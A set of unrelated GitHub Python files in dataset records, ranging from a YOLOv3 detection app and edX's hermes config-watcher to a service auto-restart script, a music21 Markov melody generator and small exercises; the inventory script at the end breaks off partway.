Image\r\n\r\n\r\ndef detect_objects(our_image):\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n col1, col2 = st.beta_columns(2)\r\n\r\n col1.subheader(\"Original Image\")\r\n st.text(\"\")\r\n plt.figure(figsize = (15,15))\r\n plt.imshow(our_image)\r\n col1.pyplot(use_column_width=True)\r\n \r\n net = cv2.dnn.readNet(\"model_final.weights\", \"yolov3.cfg\")\r\n\r\n classes = []\r\n with open(\"label.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\n layer_names = net.getLayerNames()\r\n output_layers = [layer_names[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n\r\n colors = np.random.uniform(0,255,size=(len(classes), 3)) \r\n\r\n new_img = np.array(our_image.convert('RGB'))\r\n img = cv2.cvtColor(new_img,1)\r\n height,width,channels = img.shape\r\n\r\n\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (416,416), (0,0,0), True, crop = False) #(image, scalefactor, size, mean(mean subtraction from each layer), swapRB(Blue to red), crop)\r\n\r\n net.setInput(blob)\r\n start = time.time()\r\n outs = net.forward(output_layers)\r\n end = time.time()\r\n\r\n class_ids = []\r\n confidences = []\r\n boxes =[]\r\n\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores) \r\n confidence = scores[class_id] \r\n if confidence > 0.5: \r\n \r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width) \r\n h = int(detection[3] * height) \r\n\r\n #box coordinates\r\n x = int(center_x - w /2) \r\n y = int(center_y - h/2) \r\n boxes.append([x,y,w,h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n score_threshold = st.sidebar.slider(\"Confidence Threshold\", 0.00,1.00,0.5,0.01)\r\n nms_threshold = st.sidebar.slider(\"NMS Threshold\", 0.00, 1.00, 0.4, 0.01)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences,score_threshold,nms_threshold) \r\n print(indexes)\r\n\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n items = []\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x,y,w,h = boxes[i]\r\n label = str.upper((classes[class_ids[i]])) \r\n color = colors[i]\r\n cv2.rectangle(img,(x,y),(x+w,y+h),color,3) \r\n text = \"{}: {:.4f}\".format(label, confidences[i])\r\n cv2.putText(img, text, (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.9, color, 3)\r\n items.append(label)\r\n\r\n\r\n st.text(\"\")\r\n col2.subheader(\"Object-Detected Image\")\r\n st.text(\"\")\r\n plt.figure(figsize = (15,15))\r\n plt.imshow(img)\r\n col2.pyplot(use_column_width=True)\r\n\r\n if len(indexes)>1:\r\n st.success(\"Found {} Objects - {}\".format(len(indexes),[item for item in set(items)]))\r\n st.success(\"[INFO] Time {:.6f} seconds\".format(end - start))\r\n else:\r\n st.success(\"Found {} Object - {}\".format(len(indexes),[item for item in set(items)]))\r\n st.success(\"[INFO] Time {:.6f} seconds\".format(end - start))\r\n\r\n\r\ndef object_main():\r\n\r\n st.title(\"WatchThatBot !!!\")\r\n st.markdown(\"# :camera:\")\r\n choice = st.radio(\"\", (\"Show Demo\", \"Browse an Image\"))\r\n st.write()\r\n\r\n if choice == \"Browse an Image\":\r\n st.set_option('deprecation.showfileUploaderEncoding', False)\r\n image_file = st.file_uploader(\"Upload Image\", type=['jpg','png','jpeg'])\r\n\r\n if image_file is not None:\r\n our_image = Image.open(image_file) \r\n detect_objects(our_image)\r\n\r\n elif choice == \"Show Demo\":\r\n our_image = Image.open(\"image.jpg\")\r\n detect_objects(our_image)\r\n\r\nif __name__ == '__main__':\r\n object_main()","repo_name":"udaydikshit/Data_Science","sub_path":"vehicle_detection_with_yolov3_application.py","file_name":"vehicle_detection_with_yolov3_application.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25620498079","text":"\"\"\"Model Class and Test Report Generation Function\"\"\"\n\n__author__ = \"Victor Mawusi Ayi\"\n\nimport matplotlib.image as mpimg\nfrom cv2 import resize\nfrom features import (\n contrast,\n lightness,\n luminance,\n supracontrast,\n supralightness,\n supraluminance\n)\n\nfeaturizers = {\n \"contrast\":contrast,\n \"lightness\":lightness,\n \"luminance\":luminance,\n \"supracontrast\":supracontrast,\n \"supralightness\":supralightness,\n \"supraluminance\":supraluminance\n}\n\nclass Model:\n\n def __init__(\n self,\n classifier,\n classes,\n imagesize,\n features=list(featurizers.keys()),\n accuracy=0,\n istrained=False\n ):\n self.classifier = classifier\n self.features = features\n self.classes = classes\n self.imagesize=imagesize\n self.accuracy = 0\n self.istrained = istrained\n\n def train(self, trainset):\n features, labels = trainset\n self.classifier.fit(features[self.features], labels)\n self.istrained = True\n \n def test(self, testset):\n \n if self.istrained == False:\n raise ValueError(\"Model is not trained yet\")\n\n features, labels = testset\n predictions = self.classifier.predict(\n features[self.features]\n )\n \n report = testreport(labels, predictions, (0, 1))\n self.accuracy = report[0]\n \n return report\n \n def predict(self, rgb_image):\n \n if self.istrained == False:\n raise ValueError(\"Model is not trained yet\")\n\n featurevector=[]\n image = resize(rgb_image, self.imagesize)\n \n for feature in self.features:\n featurizer = featurizers.get(feature)\n featurevector.append(\n featurizer(rgb_image)\n )\n \n prediction = self.classifier.predict([featurevector])\n prediction = self.classes[prediction[0]]\n \n return prediction\n\n\n\ndef testreport(\n actual_labels,\n predictions,\n classes_\n):\n exp_label_count = {x:0 for x in classes_}\n pred_label_count = {x:0 for x in classes_}\n tdatasize = 0\n truepossize = 0\n falsepos = []\n\n for i in range(len(predictions)):\n \n m, n = actual_labels[i], predictions[i]\n if m==n:\n pred_label_count[m] += 1\n truepossize += 1\n else:\n falsepos.append(i)\n \n tdatasize += 1\n exp_label_count[m] += 1\n\n preds = []\n for key in pred_label_count:\n p_count = pred_label_count[key]\n e_count = exp_label_count[key]\n\n preds.append(\n \"Class {}: {}/{} --> {}%\".format(\n key,\n p_count, \n e_count,\n round((p_count/e_count)*100, 2)\n )\n )\n \n accuracy = round((truepossize/tdatasize) * 100, 2)\n preds = \"\".join([\n \"Overall Accuracy -> {}%\\n\\n\".format(accuracy),\n \"Class Accuracies:\\n\",\n \"\\n\".join(preds)\n ])\n \n return preds, tuple(falsepos)\n","repo_name":"ayivima/day_night_image_analysis","sub_path":"modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24264625105","text":"#! /usr/bin/env python3\n\nimport sys\nimport subprocess\nimport click\nimport time\nimport requests\nimport yaml\nimport logging\nimport boto3\nimport backoff\nimport random\nfrom itertools import zip_longest\nimport asym_crypto_yaml\nfrom enum import Enum\n\nclass Protocol(Enum):\n https = 1\n s3 = 2\n\nvalid_protocols = []\nfor protocol in Protocol:\n valid_protocols.append(protocol)\n\n# ./hermes --interval 30\n# --filename index.html --url https://edx.org/index.html --command /edx/bin/supervisorctl restart lms \n# --filename index2.html --url https://edx.org/index2.html --command /edx/bin/supervisorctl restart cms \n# --filename index3.html --url https://edx.org/index3.html --command /edx/bin/supervisorctl restart discovery \n\n@click.command()\n@click.option('--debug/--no-debug', default=False)\n@click.option('--filename', '-f', type=str, help='filename to write to', multiple=True)\n@click.option('--url', '-u', type=str, help='url to read from', multiple=True)\n@click.option('--command', '-c', type=str, help='command to run', multiple=True)\n@click.option('--interval', '-i', type=int, help='frequency to poll all configured files, in seconds', default=40)\n@click.option('--jitter', '-j', type=int, help='each sleep will randomly add between 0 and j seconds', default=40)\n@click.option('--yamlfile', '-y', type=click.Path())\n@click.option('--secret-key-files', '-k', type=str, help='secret keys for decrypting downloaded yaml file', multiple=True)\ndef watch_config(filename, url, command, interval, jitter, debug, yamlfile, secret_key_files):\n logging.basicConfig(\n format='%(asctime)s %(levelname)-8s %(message)s',\n level=logging.DEBUG if debug else logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S')\n try:\n if yamlfile:\n with open(yamlfile) as yamlhandle:\n service_config = yaml.safe_load(yamlhandle)\n # If no keys were passed, dont fail, just dont decrypt\n # This is so hermes can function with no keys being passed.\n for block in service_config:\n if 'secret_key_files' not in block:\n block['secret_key_files'] = None\n elif len(filename) == len(url) and len(filename) == len(command):\n service_config = []\n for filename_item, url_item, command_item, secret_key_files_item in zip_longest(filename, url, command, secret_key_files):\n block = {'filename': filename_item, 'url': url_item, 'command': command_item, 'secret_key_files': secret_key_files_item}\n service_config.append(block)\n else:\n raise Exception('ERROR parsing config')\n\n except Exception as err:\n raise Exception('ERROR parsing config: %s\\n' % (str(err))) \n seconds = 0\n file_timestamps = {}\n while True:\n for config_file in service_config:\n filename_item = config_file['filename']\n url_item = config_file['url']\n command_item = config_file['command']\n secret_key_files_item = config_file['secret_key_files']\n assert filename_item != None\n assert url_item != None\n assert command_item != None\n\n protocol = get_valid_protocol_from_url(url_item)\n\n if protocol == Protocol.https and config_age_changed_https(filename_item, url_item, file_timestamps):\n download_config_https(filename_item, url_item, file_timestamps, secret_key_files_item)\n run_command_for_filename(filename_item, command_item)\n elif protocol == Protocol.s3 and config_age_changed_s3(filename_item, url_item, file_timestamps):\n download_config_s3(filename_item, url_item, file_timestamps, secret_key_files_item)\n run_command_for_filename(filename_item, command_item)\n elif protocol in valid_protocols:\n # Dont do anything - this is a valid protocol, that does not need to be updated, this is\n # correct behaviour\n logging.debug(\"No update needed.\")\n else:\n # I dont know how to compare timestamps and/or download files of this protocol\n logging.error('ERROR: unimplemented protocol %s\\n' % protocol)\n\n if interval == 0:\n break\n sleep_time = interval + random.randint(0, jitter)\n logging.debug('DEBUG: sleeping %d seconds\\n' % sleep_time)\n time.sleep(sleep_time)\n seconds = seconds + sleep_time\n logging.debug('DEBUG: woke up after %d seconds\\n' % seconds)\n\ndef run_command_for_filename(filename_item, command_item):\n logging.info('file \\'%s\\' changed, running: \\'%s\\'' % (filename_item, command_item))\n try:\n logging.info(subprocess.check_output(command_item, shell=True).decode(\"utf-8\"))\n except subprocess.CalledProcessError as err:\n logging.error(f\"Command '{err.cmd}' returned non-zero exit status {err.returncode}: {err.output.decode('utf-8')}\")\n\ndef get_valid_protocol_from_url(url):\n if url.startswith(\"https://\"):\n return Protocol.https\n elif url.startswith(\"s3://\"):\n return Protocol.s3\n else:\n raise Exception('ERROR Unsupported Protocol')\n\n\ndef config_age_changed_https(filename, url, file_timestamps):\n\n if file_timestamps.get(filename) == None:\n return True\n\n try:\n url_head = requests.head(url, timeout=2)\n except requests.exceptions.RequestException as err:\n logging.error('ERROR checking %s: %s\\n' % (str(url), str(err)))\n # If we can't head the file, log an error and continue\n return False\n if url_head.headers['Last-Modified'] != file_timestamps.get(filename):\n logging.debug('DEBUG: changed %s Server modified: %s Local modified: %s\\n' % (url, url_head.headers['Last-Modified'], file_timestamps[filename]))\n return True\n else:\n logging.debug('DEBUG: Unchanged %s\\n' % url)\n return False\n\ndef download_config_https(filename, url, file_timestamps, secret_key_files):\n try:\n url_get = requests.get(url, timeout=2)\n except requests.exceptions.RequestException as err:\n logging.error('ERROR downloading %s: %s\\n' % (str(url), str(err)))\n return False\n try:\n last_modified = url_get.headers['Last-Modified']\n encrypted_filename = filename + \".enc\"\n filehandle = open(encrypted_filename, \"w\")\n filehandle.write(str(url_get.content)) \n filehandle.close()\n decrypt_and_write_to_file(encrypted_filename, filename, secret_key_files)\n file_timestamps[filename] = last_modified\n except IOError as err:\n logging.error('ERROR writing %s: %s\\n' % (str(filename), str(err)))\n return False\n logging.info('Downloaded %s\\n' % url)\n return True\n\ndef config_age_changed_s3(filename, url, file_timestamps):\n if file_timestamps.get(filename) == None:\n return True\n\n client = boto3.client('s3')\n\n # URl is expected to be something like: s3://my-bucket-name/my-path/to/my/object\n\n bucket_and_key = extract_bucket_key_from_s3_url(url)\n bucket = bucket_and_key['bucket']\n key = bucket_and_key['key']\n\n try:\n head=client.head_object(Bucket=bucket, Key=key)\n except Exception as err:\n logging.error('ERROR checking %s: %s\\n' % (str(url), str(err)))\n # If we can't head the file, log an error and continue\n return False\n\n if head['LastModified'] != file_timestamps.get(filename):\n logging.debug('DEBUG: changed %s Server modified: %s Local modified: %s\\n' % (url, head['LastModified'], file_timestamps[filename]))\n return True\n else:\n logging.debug('DEBUG: Unchanged %s\\n' % url)\n return False\n\ndef download_config_s3(filename, url, file_timestamps, secret_key_files):\n client = boto3.client('s3')\n\n bucket_and_key = extract_bucket_key_from_s3_url(url)\n bucket = bucket_and_key['bucket']\n key = bucket_and_key['key']\n last_modified = client.head_object(Bucket=bucket, Key=key)['LastModified']\n\n try:\n encrypted_filename = filename + \".enc\"\n with open(encrypted_filename, 'wb') as data:\n client.download_fileobj(bucket, key, data)\n decrypt_and_write_to_file(encrypted_filename, filename, secret_key_files)\n file_timestamps[filename] = last_modified\n\n except IOError as err:\n logging.error('ERROR writing %s: %s\\n' % (str(filename), str(err)))\n return False\n except Exception as err:\n logging.error('ERROR downloading %s: %s\\n' % (str(url), str(err)))\n return False\n \n logging.info('Downloaded %s\\n' % url)\n return True\n\ndef extract_bucket_key_from_s3_url(url):\n # strip protocol\n bucket_and_key = url.split(\"//\")[1]\n\n # Split out bucket and key\n bucket_and_key = bucket_and_key.split(\"/\", 1)\n\n bucket = bucket_and_key[0]\n key = bucket_and_key[1]\n return {'key': key, 'bucket': bucket}\n\ndef decrypt_and_write_to_file(encrypted_filename, decrypted_output_filename, secret_key_files):\n decrypted_dict = None\n with open(encrypted_filename, \"r\") as f:\n if secret_key_files:\n secret_keys = secret_key_files.split(',')\n for secret_key in secret_keys:\n try:\n decrypted_dict = asym_crypto_yaml.load(f, secret_key)\n break\n except Exception as err:\n logging.warning('Secret key is invalid %s: %s\\n' % (str(secret_key), str(err)))\n f.seek(0)\n else:\n logging.error('ERROR decrypting File %s:' % (str(encrypted_filename)))\n decrypted_dict = asym_crypto_yaml.load(f, None)\n else:\n decrypted_dict = asym_crypto_yaml.load(f, secret_key_files)\n asym_crypto_yaml.write_dict_to_yaml(decrypted_dict, decrypted_output_filename)\n\nif __name__ == '__main__':\n watch_config()\n","repo_name":"edx/hermes","sub_path":"hermes.py","file_name":"hermes.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10428343724","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('productions', '0011_auto_20160314_2010'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductionPageJuicerSource',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('source_name', models.CharField(max_length=100, help_text='Juicer source account name, without # or @. Filters across all account types in the feed.', verbose_name='source account name')),\n ('page', modelcluster.fields.ParentalKey(to='productions.ProductionPage', related_name='juicer_sources')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n","repo_name":"ghostwords/localore","sub_path":"localore/productions/migrations/0012_productionpagejuicersource.py","file_name":"0012_productionpagejuicersource.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"76"} +{"seq_id":"15846899562","text":"from numpy.random import choice\nimport music21 as mu\n\n#song = mu.converter.parse('/Users/gene/Music/MIDI/chopin-Fantaisie-Impromptu-op66.mid')\nsong = mu.corpus.parse('bwv66.6')\n\nnotes = 16 # Change me\n\ntransition = {}\n\nprev = None\nlast = None\ntotal = 0\n\n# Gather the transitions\nfor n in song.flat.notes:\n if type(n) == mu.note.Note:\n if prev:\n if last:\n key = (prev.name, last.name)\n if key in transition:\n if n.name in transition[key]:\n transition[key][n.name] += 1\n else:\n transition[key][n.name] = 1\n else:\n transition[key] = {n.name: 1}\n prev = last\n total += 1\n last = n\n else:\n prev = n\n\n#print(transition)\n\n# Compute the probability for each transition\nfor k,v in transition.items():\n for i,j in v.items():\n transition[k][i] = j / total\n\n#print(transition)\n\n# Create a score based on the transition probabilities\nscore = mu.stream.Stream()\n\nkey = list(transition.keys())[0]\n#print('key:', key)\n\nn = mu.note.Note(key[0])\nscore.append(n)\nn = mu.note.Note(key[1])\nscore.append(n)\n\nkeys = [' '.join(i) for i in list(transition.keys())]\n\n# Append a note or a rest to the score\nfor _ in range(notes - 2):\n if key in transition:\n draw = choice(list(transition[key].keys()), 1, list(transition[key].values()))\n\n n = mu.note.Note(draw[0])\n score.append(n)\n\n key = (key[1], draw[0])\n else:\n r = mu.note.Rest()\n score.append(r)\n\n draw = choice(keys)\n key = tuple(draw.split())\n\n #print('key:', key)\n\nscore.show()\nscore.show('midi')\n","repo_name":"ology/Music","sub_path":"transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"27832237600","text":"from keras.callbacks import ModelCheckpoint\nfrom keras.utils.visualize_util import plot\nfrom kutilities.callbacks import MetricsCallback, WeightsCallback, PlottingCallback\nfrom sklearn.metrics import accuracy_score\n\nfrom dataset.Semeval_Task6_data_loader import SemEval2017Task6\nfrom models.task6A_models import humor_RNN\nfrom utilities.data_loader import Task6Loader, prepare_dataset, get_embeddings\nfrom utilities.ignore_warnings import set_ignores\n\nset_ignores()\nimport numpy\nimport pickle\n\nnumpy.random.seed(1337) # for reproducibility\ntext_length = 50\nTASK = \"1\" # Select the Subtask (1 or 2)\n\n# specify the word vectors file to use.\n# for example, WC_CORPUS = \"own.twitter\" and WC_DIM = 300,\n# correspond to the file \"datastories.twitter.300d.txt\"\nWV_CORPUS = \"datastories.twitter\"\nWV_DIM = 300\n\n# Flag that sets the training mode.\n# - if FINAL == False, then the dataset will be split in {train, val, test}\n# - if FINAL == True, then the dataset will be split in {train, val}.\n# Even for training the model for the final submission a small percentage\n# of the labeled data will be kept for as a validation set for early stopping\nFINAL = True\n\n# If True, the SemEval gold labels will be used as the testing set in order to perform Post-mortem analysis\nSEMEVAL_GOLD = False\n\n############################################################################\n# PERSISTENCE\n############################################################################\n# if True save model checkpoints, as well as the corresponding word indices\n# you HAVE tp set PERSIST = True, in order to be able to use the trained model later\nPERSIST = False\nbest_model = lambda: \"cp_model_task6_sub{}.hdf5\".format(TASK)\nbest_model_word_indices = lambda: \"cp_model_task6_sub{}_word_indices.pickle\".format(TASK)\n\n############################################################################\n# LOAD DATA\n############################################################################\nembeddings, word_indices = get_embeddings(corpus=WV_CORPUS, dim=WV_DIM)\n\nif PERSIST:\n pickle.dump(word_indices, )\n\nloader = Task6Loader(word_indices, text_lengths=(text_length, text_length), subtask=TASK, y_one_hot=False,\n own_vectors=WV_CORPUS.startswith(\"own\"))\n\nif FINAL:\n print(\"\\n > running in FINAL mode!\\n\")\n training, testing = loader.load_final()\nelse:\n training, validation, testing = loader.load_train_val_test()\n\nif SEMEVAL_GOLD:\n print(\"\\n > running in Post-Mortem mode!\\n\")\n gold_data = SemEval2017Task6().get_gold_data_task_1()\n gold_data = [v for k, v in sorted(gold_data.items())]\n X = [x for hashtag in gold_data for x in hashtag[0]]\n y = [x for hashtag in gold_data for x in hashtag[1]]\n gold = prepare_dataset(X, y, loader.pipeline, loader.y_one_hot, y_as_is=loader.subtask == \"2\")\n\n validation = testing\n testing = gold\n FINAL = False\n\nprint(\"Building NN Model...\")\nnn_model = humor_RNN(embeddings, text_length)\n# nn_model = humor_CNN(embeddings, text_length)\n# nn_model = humor_FFNN(embeddings, text_length)\nplot(nn_model, show_layer_names=True, show_shapes=True, to_file=\"model_task6_sub{}.png\".format(TASK))\nprint(nn_model.summary())\n\n############################################################################\n# CALLBACKS\n############################################################################\nmetrics = {\n \"acc\": (lambda y_test, y_pred: accuracy_score(y_test, y_pred)),\n}\n\n_callbacks = []\n\n_datasets = {}\n_datasets[\"1-train\"] = (training[0], training[1])\n_datasets[\"2-val\"] = (validation[0], validation[1]) if not FINAL else (testing[0], testing[1])\nif not FINAL:\n _datasets[\"3-test\"] = (testing[0], testing[1]) if not FINAL else None\n\nmetrics_callback = MetricsCallback(datasets=_datasets, metrics=metrics)\n\n_callbacks.append(metrics_callback)\n_callbacks.append(PlottingCallback(grid_ranges=(0.5, 1.), height=4))\n_callbacks.append(WeightsCallback(parameters=[\"W\"], stats=[\"raster\", \"max\", \"mean\", \"std\"]))\n\nif PERSIST:\n checkpointer = ModelCheckpoint(filepath=best_model(), monitor='val.acc', mode=\"max\", verbose=1, save_best_only=True)\n _callbacks.append(checkpointer)\n\nhistory = nn_model.fit(training[0], training[1],\n validation_data=(validation[0], validation[1]) if not FINAL else (testing[0], testing[1]),\n nb_epoch=15, batch_size=256,\n verbose=1,\n callbacks=_callbacks)\n\npickle.dump(history.history, open(\"hist.pickle\", \"wb\"))\n","repo_name":"cbaziotis/datastories-semeval2017-task6","sub_path":"models/task6A.py","file_name":"task6A.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"76"} +{"seq_id":"3512458627","text":"import numpy as np\nimport cv2\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncap = cv2.VideoCapture(0)\nframe_id = 0\n\nwhile True:\n _, frame = cap.read()\n frame_id += 1\n (H, W) = frame.shape[:2]\n\n faces = face_cascade.detectMultiScale(frame, 1.3, 5)\n for (x, y, w, h) in faces:\n frame = cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi = frame[y:y+h, x:x+w]\n\n cv2.imshow(\"Image\", frame)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Neihtq/face-recognition-lock","sub_path":"haar_face_detection.py","file_name":"haar_face_detection.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26767481868","text":"from django.urls import path\nfrom django.views.generic import TemplateView\n\nfrom . import views\n\napp_name = 'books'\n\nurlpatterns = [\n\tpath('', views.BookList.as_view(), name='list'),\n path('upload/', views.UploadBook.as_view(), name='upload'),\n path('/delete/', views.DeleteBook.as_view(), name='delete'),\n path('/download/', views.download_book, name='download'),\n path('/read/', views.read_book, name='read'),\n path('pdf/viewer.html/', views.view_book, name='view-book'),\n]\n","repo_name":"shoukreytom/pdfstack","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33676582709","text":"##Installing Tkinter\nfrom tkinter import *\n\n##What Happens When You Mine Gold\ndef mined():\n lbl.configure(text=\"You have mined gold!\")\n\n\n##Window Settings\nwindow = Tk()\nwindow.title(\"Gold Miner\")\nwindow.state('zoomed')\n\n##The 'Mine Gold' Button\nbtn = Button(window, text=\"Mine Gold\", command=mined)\nbtn.grid(column=0, row=0)\n\n##The Text\nlbl = Label(window, text=\"You have not mined gold.\")\nlbl.grid(column=1, row=0)\n\n##The Window\nwindow.mainloop()\n\n##NOTES\n##This app was made as a joke but I continue to update anyways. Anyone can use the code above.","repo_name":"4444dogs/GoldMiner","sub_path":"goldminer.py","file_name":"goldminer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12857386822","text":"class Seminar2_hw3:\n def main(self):\n a = 90\n b = 3\n if b != 0:\n print(a/b)\n\n self.printSum(23, 234)\n abc = [1, 2]\n if 3 < len(abc):\n abc[3] = 9\n\n def printSum(self, a, b):\n print(a + b)\n\nseminar = Seminar2_hw3()\nseminar.main()","repo_name":"NikNEZH/Exceptions","sub_path":"HW2/w3.py","file_name":"w3.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9697209794","text":"#!/usr/bin/env python3\n\n\"\"\"\n * @author Shadoworker5 Dev\n * @email shadoworker5@protonmail.com\n * @create date 2023-06-16 12:28:04\n * @modify date 2023-07-10 15:10:10\n\"\"\"\nimport os\nimport subprocess\nfrom requests import post as postQuery\nfrom datetime import datetime\n\n# To use this script you must follow this guide\n## Copy this script in /etc/init.d/\n## Define schedule job in crontab example */5 * * * * root /etc/init.d/services_auto_start.py\n## uncomment sendNotificationToSlack or sendNotificationToDiscord about your\n\nLOG_FILE_PATH = \"/tmp/services_auto_start.log\"\nSLACK_BOT_URL = \"https://hooks.slack.com/services/XXXXXXXXX/XXXXXXXXX/XXXXXXXXXXXXXXXXXX\"\nDISCORD_WEBHOOKS = \"https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n\n# Define dictionnary for all service to monitor\nCHECK_SERVICES = {\n \"ssh\" : {\n \"port\" : 22,\n \"command\" : \"service ssh start\"\n },\n \"apache2\" : {\n \"port\" : 80,\n \"command\" : \"service apache2 start\"\n },\n \"openvpn\" : {\n \"port\" : 1194,\n \"command\" : \"service openvpn start\"\n },\n \"mysql\" : {\n \"port\" : 3306,\n \"command\" : \"service mysql start\"\n }\n}\n\ndef executeCommande(command):\n os.system(command)\n\ndef getCurrentTime():\n return datetime.now()\n\ndef writeInLogFile(msg):\n with open(LOG_FILE_PATH, \"a\") as log_file:\n log_file.write(msg)\n \ndef checkPortStatus(port):\n result = subprocess.getoutput(f\"nc -vz localhost {port}\")\n writeInLogFile(f\"[{getCurrentTime()}] Checking port: {port} ==> {result}\\n\")\n if \"refused\" not in result:\n return True\n else:\n return False\n\ndef checkServiceStatus():\n for i in CHECK_SERVICES:\n if checkPortStatus(CHECK_SERVICES[i][\"port\"]):\n continue\n else:\n command = CHECK_SERVICES[i][\"command\"]\n message = f\"[{getCurrentTime()}] Starting service {i} with command: \\\"{command}\\\" \\n\"\n writeInLogFile(message)\n executeCommande(command)\n # sendNotificationToSlack(message)\n # sendNotificationToDiscord(message)\n \ndef sendNotificationToSlack(message):\n response = postQuery(SLACK_BOT_URL, data=message)\n writeInLogFile(f\"[{getCurrentTime()}] sendNotificationToSlack response: \\\"{response.text}\\\" \\n\")\n\ndef sendNotificationToDiscord(message):\n response = postQuery(DISCORD_WEBHOOKS, data=message)\n writeInLogFile(f\"[{getCurrentTime()}] sendNotificationToDiscord response: \\\"{response.text}\\\" \\n\")\n \nif __name__ == \"__main__\":\n try:\n checkServiceStatus()\n except Exception as e:\n writeInLogFile(f\"Error: {str(e)}\\n\")","repo_name":"shadoworker5/Cyber-security-code","sub_path":"services_auto_start.py","file_name":"services_auto_start.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"12287714901","text":"# Recursive\nclass Solution:\n def closestValue(self, root, target):\n \"\"\"\n :type root: TreeNode\n :type target: float\n :rtype: int\n \"\"\"\n self.closest = float('inf')\n \n def helper(root, value):\n if not root:\n return\n if abs(root.val - target) < abs(self.closest - target):\n self.closest = root.val\n \n # Target should be located on left subtree\n if target < root.val:\n helper(root.left, target)\n \n # target should be located on right subtree\n if target > root.val:\n helper(root.right, target)\n \n helper(root, target)\n return self.closest\n\n# Iterative\nclass Solution(object):\n def closestValue(self, root, target):\n closest = root.val\n while root:\n if abs(root.val - target) < abs(closest - target):\n closest = root.val\n root = root.left if target < root.val else root.right\n return closest\n\n# > Time Complexity O(N)\n# > Space Complexity O(1)\n","repo_name":"neo4u/neophyte","sub_path":"google/closest_bst_value.py","file_name":"closest_bst_value.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19665233438","text":"import json as j\r\n\r\n\r\nclass InventoryItem:\r\n \r\n def __init__(self, itemName):\r\n self.name = itemName\r\n self.totalStocked = 0\r\n self.totalInStock = 0\r\n self.totalSlots = 0\r\n \r\n def addToStocked (self, stockAmt ):\r\n self.totalStocked = self.totalStocked + stockAmt\r\n \r\n def addToInStock (self, inStockAmt):\r\n self.totalInStock = self.totalInStock + inStockAmt\r\n \r\n def incrementSlots(self):\r\n self.totalSlots = self.totalSlots + 1\r\n \r\n def __repr__(self):\r\n return '{} In Stock: {}, Stocked: {}, Slots: {}'.format(self.name,self.totalInStock, self.totalStocked, self.totalSlots)\r\n \r\n def getNumSold(self):\r\n return self.totalStocked - self.totalInStock\r\n \r\n def getSoldPct(self):\r\n return self.getNumSold() / self.totalStocked\r\n \r\n def getStockNeed(self):\r\n return 8 * self.totalSlots - self.totalInStock\r\n \r\n def getName(self):\r\n return self.name\r\n \r\n def getNumInStock(self):\r\n return self.totalInStock\r\n \r\ndef main():\r\n itemNameToInventoryItem = {}\r\n inventoryFileNames = \"REID_1F_20171004.json\",\"REID_2F_20171004.json\",\"REID_3F_20171004.json\"\r\n for inventoryFileName in inventoryFileNames:\r\n inventoryFile = open(inventoryFileName, 'r')\r\n\r\n inventoryData = j.loads(inventoryFile.read())\r\n print(inventoryData['machine_label'])\r\n print(inventoryData['machine_id'])\r\n\r\n contents = inventoryData['contents']\r\n\r\n for row in contents:\r\n #print(row['row'])\r\n for slot in row['slots']:\r\n #searches inventoryItem to see if avail, if not creates.\r\n itemName = slot['item_name']\r\n inventoryItem = itemNameToInventoryItem.get(itemName, InventoryItem(itemName))\r\n \r\n inventoryItem.addToStocked(slot['last_stock'])\r\n 